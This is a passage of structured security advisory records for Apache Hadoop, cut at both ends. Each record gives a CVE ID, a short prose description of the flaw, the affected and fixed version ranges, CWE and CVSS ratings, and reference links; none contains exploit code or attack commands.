"url": "https://lists.apache.org/thread.html/r513758942356ccd0d14538ba18a09903fc72716d74be1cb727ea91ff%40%3Cgeneral.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4a57de5215494c35c8304cf114be75d42df7abc6c0c54bf163c3e370@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r49c9ab444ab1107c6a8be8a0d66602dec32a16d96c2631fec8d309fb@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0a534f1cde7555f7208e9f9b791c1ab396d215eaaef283b3a9153429@%3Ccommits.druid.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/apache/hadoop" } ], "database_specific": { "cwe_ids": [ "CWE-269", "CWE-863" ], "github_reviewed": true, "github_reviewed_at": "2021-04-06T18:29:12Z", "nvd_published_at": "2021-01-26T18:16:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-g48f-ff5h-5f64", "published": "2022-05-17T03:44:57Z", "modified": "2023-11-08T03:57:50.385135Z", "aliases": [ "CVE-2015-1776" ], "summary": "Exposure of Sensitive Information to an Unauthorized Actor in Apache Hadoop", "details": "Apache Hadoop 2.6.x encrypts intermediate data generated by a MapReduce job and stores it along with the encryption key in a credentials file on disk when the Intermediate data encryption feature is enabled, which allows local users to obtain sensitive information by reading the file.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.6.0" }, { "fixed": "2.6.5" } ] } ], "versions": [ "2.6.0", "2.6.1", "2.6.2", "2.6.3", "2.6.4" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.6.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-g48f-ff5h-5f64/GHSA-g48f-ff5h-5f64.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-1776" }, { "type": "WEB", "url": "http://mail-archives.apache.org/mod_mbox/hadoop-general/201602.mbox/%3CCAGCyb56CPgQMcxZ7jP87SfM5OKGx+E49DtrzCTQ6+nQf2a4nSA@mail.gmail.com%3E" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], "github_reviewed": true, "github_reviewed_at": "2022-07-06T20:26:12Z", "nvd_published_at": "2016-04-19T21:59:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-gx2c-fvhc-ph4j", "published": "2022-04-08T00:00:21Z", "modified": "2025-10-01T14:55:55.727257Z", "aliases": [ "CVE-2022-26612" ], "summary": "Path traversal in Hadoop", "details": "In Apache Hadoop, The unTar function uses unTarUsingJava function on Windows and the built-in tar utility on Unix and other OSes. As a result, a TAR entry may create a symlink under the expected extraction directory which points to an external directory. A subsequent TAR entry may extract an arbitrary file into the external directory using the symlink name. This however would be caught by the same targetDirPath check on Unix because of the getCanonicalPath call. However on Windows, getCanonicalPath doesn't resolve symbolic links, which bypasses the check. unpackEntries during TAR extraction follows symbolic links which allows writing outside expected base directory on Windows. This was addressed in Apache Hadoop 2.10.2, 3.2.3, 3.3.3, and 3.4.0.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.2.0" }, { "fixed": "3.2.3" } ] } ], "versions": [ "3.2.0", "3.2.1", "3.2.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/04/GHSA-gx2c-fvhc-ph4j/GHSA-gx2c-fvhc-ph4j.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.10.2" } ] } ], "versions": [ "0.22.0", "0.23.1", "0.23.10", "0.23.11", "0.23.3", "0.23.4", "0.23.5", "0.23.6", "0.23.7", "0.23.8", "0.23.9", "2.0.0-alpha", "2.0.1-alpha", "2.0.2-alpha", "2.0.3-alpha", "2.0.4-alpha", "2.0.5-alpha", "2.0.6-alpha", "2.1.0-beta", "2.1.1-beta", "2.10.0", "2.10.1", "2.2.0", "2.3.0", "2.4.0", "2.4.1", "2.5.0", "2.5.1", "2.5.2", "2.6.0", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.7.0", "2.7.1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.8.0", "2.8.1", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.9.0", "2.9.1", "2.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/04/GHSA-gx2c-fvhc-ph4j/GHSA-gx2c-fvhc-ph4j.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.3.0" }, { "fixed": "3.3.3" } ] } ], "versions": [ "3.3.0", "3.3.1", "3.3.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/04/GHSA-gx2c-fvhc-ph4j/GHSA-gx2c-fvhc-ph4j.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-26612" }, { "type": "PACKAGE", "url": "https://github.com/apache/hadoop" }, { "type": "WEB", "url": "https://github.com/apache/hadoop/commits/rel/release-2.10.2/hadoop-common-project/hadoop-common/src/main/java/org/apache/hadoop/fs/FileUtil.java" }, { "type": "WEB", "url": "https://github.com/apache/hadoop/commits/rel/release-3.2.3/hadoop-common-project/hadoop-common/src/main/java/org/apache/hadoop/fs/FileUtil.java" }, { "type": "WEB", "url": "https://github.com/apache/hadoop/commits/rel/release-3.3.3/hadoop-common-project/hadoop-common/src/main/java/org/apache/hadoop/fs/FileUtil.java" }, { "type": "WEB", "url": "https://github.com/apache/hadoop/commits/rel/release-3.4.0/hadoop-common-project/hadoop-common/src/main/java/org/apache/hadoop/fs/FileUtil.java" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/HADOOP-18317" }, { "type": "WEB", "url": "https://lists.apache.org/thread/hslo7wzw2449gv1jyjk8g6ttd7935fyz" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220519-0004" } ], "database_specific": { "cwe_ids": [ "CWE-22" ], "github_reviewed": true, "github_reviewed_at": "2022-04-08T22:06:47Z", "nvd_published_at": "2022-04-07T19:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-h24p-qwf4-84q8", "published": "2022-05-17T02:41:57Z", "modified": "2023-11-08T03:59:26.035253Z", "aliases": [ "CVE-2017-7669" ], "summary": "Apache Hadoop's LinuxContainerExecutor runs docker commands as root with insufficient input validation", "details": "In Apache Hadoop 2.8.0, 3.0.0-alpha1, and 3.0.0-alpha2, the LinuxContainerExecutor runs docker commands as root with insufficient input validation. When the docker feature is enabled, authenticated users can run commands as root. This issue is fixed in versions 2.8.1 and 3.0.0-alpha3.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.8.1" } ] } ], "versions": [ "0.22.0", "0.23.1", "0.23.10", "0.23.11", "0.23.3", "0.23.4", "0.23.5", "0.23.6", "0.23.7", "0.23.8", "0.23.9", "2.0.0-alpha", "2.0.1-alpha", "2.0.2-alpha", "2.0.3-alpha", "2.0.4-alpha", "2.0.5-alpha", "2.0.6-alpha", "2.1.0-beta", "2.1.1-beta", "2.2.0", "2.3.0", "2.4.0", "2.4.1", "2.5.0", "2.5.1", "2.5.2", "2.6.0", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.7.0", "2.7.1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.8.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-h24p-qwf4-84q8/GHSA-h24p-qwf4-84q8.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0-alpha1" }, { "fixed": "3.0.0-alpha3" } ] } ], "versions": [ "3.0.0-alpha1", "3.0.0-alpha2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-h24p-qwf4-84q8/GHSA-h24p-qwf4-84q8.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-7669" }, { "type": "WEB", "url": "https://mail-archives.apache.org/mod_mbox/hadoop-user/201706.mbox/%3C4A2FDA56-491B-4C2A-915F-C9D4A4BDB92A%40apache.org%3E" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/98795" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-11-22T18:47:34Z", "nvd_published_at": "2017-06-05T01:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-mf7c-35mq-75pj", "published": "2022-05-14T03:24:59Z", "modified": "2023-11-08T03:58:33.830753Z", "aliases": [ "CVE-2016-6811" ], "summary": "Insecure Inherited Permissions in Apache Hadoop", "details": "In Apache Hadoop 2.x before 2.7.4, a user who can escalate to yarn user can possibly run arbitrary commands as root user.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0-alpha" }, { "fixed": "2.7.4" } ] } ], "versions": [ "2.0.0-alpha", "2.0.1-alpha", "2.0.2-alpha", "2.0.3-alpha", "2.0.4-alpha", "2.0.5-alpha", "2.0.6-alpha", "2.1.0-beta", "2.1.1-beta", "2.2.0", "2.3.0", "2.4.0", "2.4.1", "2.5.0", "2.5.1", "2.5.2", "2.6.0", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.7.0", "2.7.1", "2.7.2", "2.7.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-mf7c-35mq-75pj/GHSA-mf7c-35mq-75pj.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-6811" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9ba3c12bbdfd5b2cae60909e48f92608e00c8d99196390b8cfeca307@%3Cgeneral.hadoop.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-277" ], "github_reviewed": true, "github_reviewed_at": "2022-07-06T19:45:49Z", "nvd_published_at": "2017-04-11T14:59:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-pxv5-5vmp-3jj4", "published": "2022-05-17T02:54:07Z", "modified": "2024-12-06T05:49:00.331067Z", "aliases": [ "CVE-2013-2192" ], "summary": "Improper Authentication in Apache Hadoop", "details": "The RPC protocol implementation in Apache Hadoop 2.x before 2.0.6-alpha, 0.23.x before 0.23.9, and 1.x before 1.2.1, when the Kerberos security features are enabled, allows man-in-the-middle attackers to disable bidirectional authentication and obtain sensitive information by forcing a downgrade to simple authentication.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.0.6-alpha" } ] } ], "versions": [ "2.0.1-alpha", "2.0.2-alpha", "2.0.3-alpha", "2.0.4-alpha", "2.0.5-alpha" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.0.5-alpha", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-pxv5-5vmp-3jj4/GHSA-pxv5-5vmp-3jj4.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0.23.0" }, { "fixed": "0.23.9" } ] } ], "versions": [ "0.23.1", "0.23.3", "0.23.4", "0.23.5", "0.23.6", "0.23.7", "0.23.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-pxv5-5vmp-3jj4/GHSA-pxv5-5vmp-3jj4.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-2192" }, { "type": "WEB", "url": "https://www.cloudera.com/documentation/other/security-bulletins/topics/csb_topic_1.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-0037.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-0400.html" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2013/Aug/251" } ], "database_specific": { "cwe_ids": [ "CWE-287" ], "github_reviewed": true, "github_reviewed_at": "2022-07-08T19:10:34Z", "nvd_published_at": "2014-01-24T18:55:00Z", "severity": "LOW" } }, { "schema_version": "1.7.3", "id": "GHSA-rmpj-7c96-mrg8", "published": "2022-06-14T00:00:37Z", "modified": "2024-02-22T05:34:28.037449Z", "aliases": [ "CVE-2021-37404" ], "summary": "Apache Hadoop heap overflow before v2.10.2, v3.2.3, v3.3.2", "details": "There is a potential heap buffer overflow in Apache Hadoop libhdfs native code. Opening a file path provided by user without validation may result in a denial of service or arbitrary code execution. Users should upgrade to Apache Hadoop 2.10.2, 3.2.3, 3.3.2 or higher.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.3.0" }, { "fixed": "3.3.2" } ] } ], "versions": [ "3.3.0", "3.3.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/06/GHSA-rmpj-7c96-mrg8/GHSA-rmpj-7c96-mrg8.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.2.3" } ] } ], "versions": [ "3.0.0", "3.0.1", "3.0.2", "3.0.3", "3.1.0", "3.1.1", "3.1.2", "3.1.3", "3.1.4", "3.2.0", "3.2.1", "3.2.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/06/GHSA-rmpj-7c96-mrg8/GHSA-rmpj-7c96-mrg8.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.10.2" } ] } ], "versions": [ "0.22.0", "0.23.1", "0.23.10", "0.23.11", "0.23.3", "0.23.4", "0.23.5", "0.23.6", "0.23.7", "0.23.8", "0.23.9", "2.0.0-alpha", "2.0.1-alpha", "2.0.2-alpha", "2.0.3-alpha", "2.0.4-alpha", "2.0.5-alpha", "2.0.6-alpha", "2.1.0-beta", "2.1.1-beta", "2.10.0", "2.10.1", "2.2.0", "2.3.0", "2.4.0", "2.4.1", "2.5.0", "2.5.1", "2.5.2", "2.6.0", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.7.0", "2.7.1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.8.0", "2.8.1", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.9.0", "2.9.1", "2.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/06/GHSA-rmpj-7c96-mrg8/GHSA-rmpj-7c96-mrg8.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37404" }, { "type": "PACKAGE", "url": "https://github.com/apache/hadoop" }, { "type": "WEB", "url": "https://lists.apache.org/thread/2h56ztcj3ojc66qzf1nno88vjw9vd4wo" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220715-0007" } ], "database_specific": { "cwe_ids": [ "CWE-120", "CWE-131", "CWE-787" ], "github_reviewed": true, "github_reviewed_at": "2022-06-17T01:09:36Z", "nvd_published_at": "2022-06-13T07:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-37pw-qw47-4jxm", "published": "2019-05-31T16:09:15Z", "modified": "2024-02-16T08:05:28.334834Z", "aliases": [ "CVE-2018-8029" ], "summary": "Privilege escalation vulnerability in Apache Hadoop", "details": "In Apache Hadoop versions 3.0.0-alpha1 to 3.1.0, 2.9.0 to 2.9.1, and 2.2.0 to 2.8.4, a user who can escalate to yarn user can possibly run arbitrary commands as root user.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.2.0" }, { "fixed": "2.8.4" } ] } ], "versions": [ "2.2.0", "2.3.0", "2.4.0", "2.4.1", "2.5.0", "2.5.1", "2.5.2", "2.6.0", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.7.0", "2.7.1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.8.0", "2.8.1", "2.8.2", "2.8.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/05/GHSA-37pw-qw47-4jxm/GHSA-37pw-qw47-4jxm.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.2" } ] } ], "versions": [ "2.9.0", "2.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/05/GHSA-37pw-qw47-4jxm/GHSA-37pw-qw47-4jxm.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.1.1" } ] } ], "versions": [ "3.0.0", "3.0.1", "3.0.2", "3.0.3", "3.1.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/05/GHSA-37pw-qw47-4jxm/GHSA-37pw-qw47-4jxm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-8029" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/0b8d58e02dbd0fb8bf7320c514fe58da1d6728bdc150f1ba04e0d9fc@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/17084c09e6dedf60efe08028b429c92ffd28aacc28454e4fa924578a@%3Cgeneral.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a0164b87660223a2d491f83c88f905fe1a9fa8dc795148d9b0d968c8@%3Cdev.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a97c53a81e639ca2fc7b8f61a4fcd1842c2a78544041244a7c624727@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4dddf1705dbedfa94392913b2dad1cd2d1d89040facd389eea0b3510@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb21df54a4e39732ce653d2aa5672e36a792b59eb6717f2a06bb8d02a@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190617-0001" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/108518" } ], "database_specific": { "cwe_ids": [ "CWE-285" ], "github_reviewed": true, "github_reviewed_at": "2019-05-31T16:08:38Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-3v44-382q-55f4", "published": "2018-12-21T17:50:13Z", "modified": "2023-11-08T03:58:58.547397Z", "aliases": [ "CVE-2017-15713" ], "summary": "Moderate severity vulnerability that affects org.apache.hadoop:hadoop-main", "details": "Vulnerability in Apache Hadoop 0.23.x, 2.x before 2.7.5, 2.8.x before 2.8.3, and 3.0.0-alpha through 3.0.0-beta1 allows a cluster user to expose private files owned by the user running the MapReduce job history server process. The malicious user can construct a configuration file containing XML directives that reference sensitive files on the MapReduce job history server host.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.7.5" } ] } ], "versions": [ "0.23.1", "0.23.10", "0.23.11", "0.23.3", "0.23.4", "0.23.5", "0.23.6", "0.23.7", "0.23.8", "0.23.9", "2.0.0-alpha", "2.0.1-alpha", "2.0.2-alpha", "2.0.3-alpha", "2.0.4-alpha", "2.0.5-alpha", "2.0.6-alpha", "2.1.0-beta", "2.1.1-beta", "2.2.0", "2.3.0", "2.4.0", "2.4.1", "2.5.0", "2.5.1", "2.5.2", "2.6.0", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.7.0", "2.7.1", "2.7.2", "2.7.3", "2.7.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/12/GHSA-3v44-382q-55f4/GHSA-3v44-382q-55f4.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.3" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/12/GHSA-3v44-382q-55f4/GHSA-3v44-382q-55f4.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-15713" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-3v44-382q-55f4" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a790a251ace7213bde9f69777dedb453b1a01a6d18289c14a61d4f91@%3Cgeneral.hadoop.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T20:56:25Z", "nvd_published_at": null, "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4fh8-pm7g-pmxq", "published": "2022-02-10T20:28:06Z", "modified": "2024-02-17T05:29:43.227712Z", "aliases": [ "CVE-2018-11764" ], "summary": "Authentication bypass in Apache Hadoop", "details": "Web endpoint authentication check is broken in Apache Hadoop 3.0.0-alpha4, 3.0.0-beta1, and 3.0.0. Authenticated users may impersonate any user even if no proxy user is configured.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0-alpha4" }, { "fixed": "3.0.1" } ] } ], "versions": [ "3.0.0-alpha4", "3.0.0", "3.0.0-beta1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/02/GHSA-4fh8-pm7g-pmxq/GHSA-4fh8-pm7g-pmxq.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0-beta1" }, { "fixed": "3.0.1" } ] } ], "versions": [ "3.0.0-beta1", "3.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/02/GHSA-4fh8-pm7g-pmxq/GHSA-4fh8-pm7g-pmxq.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.0.1" } ] } ], "versions": [ "3.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/02/GHSA-4fh8-pm7g-pmxq/GHSA-4fh8-pm7g-pmxq.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-11764" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r790ad0a049cde713b93589ecfd4dd2766fda0fc6807eedb6cf69f5c1%40%3Cgeneral.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20201103-0003" } ], "database_specific": { "cwe_ids": [ "CWE-306" ], "github_reviewed": true, "github_reviewed_at": "2021-04-22T21:44:53Z", "nvd_published_at": "2020-10-21T19:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5cf4-jqwp-584g", "published": "2019-03-25T16:17:32Z", "modified": "2024-02-19T05:28:21.165145Z", "aliases": [ "CVE-2018-11767" ], "summary": "Improper Privilege Management in org.apache.hadoop:hadoop-main", "details": "In Apache Hadoop 2.9.0 to 2.9.1, 2.8.3 to 2.8.4, 2.7.5 to 2.7.6, KMS blocking users or granting access to users incorrectly, if the system uses non-default groups mapping mechanisms.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.5" }, { "fixed": "2.7.7" } ] } ], "versions": [ "2.7.5", "2.7.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/03/GHSA-5cf4-jqwp-584g/GHSA-5cf4-jqwp-584g.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.3" }, { "fixed": "2.8.5" } ] } ], "versions": [ "2.8.3", "2.8.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/03/GHSA-5cf4-jqwp-584g/GHSA-5cf4-jqwp-584g.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.2" } ] } ], "versions": [ "2.9.0", "2.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/03/GHSA-5cf4-jqwp-584g/GHSA-5cf4-jqwp-584g.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-11767" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-5cf4-jqwp-584g" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/246cf223e7dc0c1dff90b78dccb6c3fe94e1a044dbf98e2333393302@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5a44590b4eedc5e25f5bd3081d1631b52c174b5b99157f7950ddc270@%3Ccommon-dev.hadoop.apache.org%3E" }, { "type": "WEB", "url": 